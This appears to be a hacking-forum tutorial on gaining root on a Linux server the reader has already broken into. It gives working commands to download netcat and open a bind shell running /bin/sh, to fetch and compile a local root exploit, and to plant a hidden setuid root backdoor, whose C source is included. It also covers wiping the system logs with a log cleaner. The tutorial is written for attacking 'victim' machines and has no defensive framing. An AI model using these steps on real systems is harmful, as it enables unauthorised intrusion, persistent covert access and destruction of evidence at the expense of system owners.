**Please note: you must have access to a Linux box prior to using this tutorial (this is rooting ONLY).**
First: Download / Obtain Access to the Following:
Required for this Tutorial:
Shell Access - To a Linux Box
Local Root Exploit - Depending on Linux OS and Kernel Version of Box
mig-log cleaner -
[You must be registered and logged in to see this link.] and learn how to compile it
Netcat -
[You must be registered and logged in to see this link.]Netcat(unix) -
[You must be registered and logged in to see this link.] and learn how to compile it
Patience - Work at it until you get the job done.
Now that you have all that in order lets begin.
Step 1: Reconnaissance
Login to Shell -> Find Out Linux OS and Kernel Versions of Box (ie: Linux 2.6.8) -> Locate a "Local Root Exploit" for Linux Version (can be found using Google/security vulnerability websites) -> Go into a Writable Folder in the Shell
Step 2: Netcat
Find the "Command Execution" area in the Shell -> Enter the following: wget
[You must be registered and logged in to see this link.] (unshortened) -> Type chmod +x nc -> Find the "Command Execution" area in the Shell -> Enter the following: ./nc -l -p 8080 -e /bin/sh (example: shell can be /bin/sh or cmd.exe) -> Install Netcat on your PC -> Enter the following: nc VictimIP Port *in our case 8080* -> Then enter: eg 123.123.123.123 8080
This should make an interactive shell, if it didn't, verify whether or not port 8080 was open. However, if you DO have an interactive shell.. this box is ready for rooting. Type the following: nc victimip port
Step 3: Exploiting
Find the Local Root Exploit for this Box -> In the newly spawned shell, type wget
[You must be registered and logged in to see this link.] -> If the exploit is not compiled, compile it by typing the following: gcc xpl.c -o xpl;chmod +x xpl -> Now, chmod xpl ->
**Note: The exploit will vary on their usage so make sure you have an understanding of the root exploit you are using.**
You can run your xpl file by entering in: ./xpl
Wait until your exploit is finished running once it is done enter:
whoami
What the whoami command does is tells you who you are if this tells you root then you xpl has done
it's job and you now have root priv's on the box. or you can type:
id
which will give you something like:
uid=0(root) gid=0(root) groups=500(apache) or something similar
And now you can do your happy dance.
Now that we have rooted the box and finished humiliating ourselves by dancing around we want to make
sure that we can come and go as we please without all the hassel of rooting the box over and over. So
we will want to create some kind of backdoor.
we can make this happen with few lines of code:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main( void )
{
setuid( 0 );
system( "/bin/bash" );
return 0;
}
Compile it and change permissions:
root@foobar /root# gcc -o .bkdr main.c
root@foobar /root# chown root:root .bkdr
root@foobar /root# chmod +s .bkdr
Now, all you have to do is put .bkdr somewhere on the system where you can execute it (preferrably
in the $PATH) and if you execute it as another user:
raif@foobar /home/raif$ /usr/local/bin/.bkdr
root@foobar /home/raif# whoami
root
Now you have your access back.
Alright we are almost completed our mission we have successfully rooted our victims box created our backdoor now all we need to do is wipe our tracks that we left in the logs and be on our way. This can be done by using a log cleaner of some kind. For this tutorial we used mig-log cleaner. which you
can get here:
[You must be registered and logged in to see this link.]Once again we can use our wget command to upload our logcleaner to the rooted box.
[You must be registered and logged in to see this link.]now just run the logcleaner
./miglc
The mig-log Cleaner has a wide variety of functions which are displayed when you run the log cleaner
so you may choose how exactly you want to clean the logs with the commands given to you. I hope you
enjoyed my tutorial and learned something from it as well. Good luck to you all.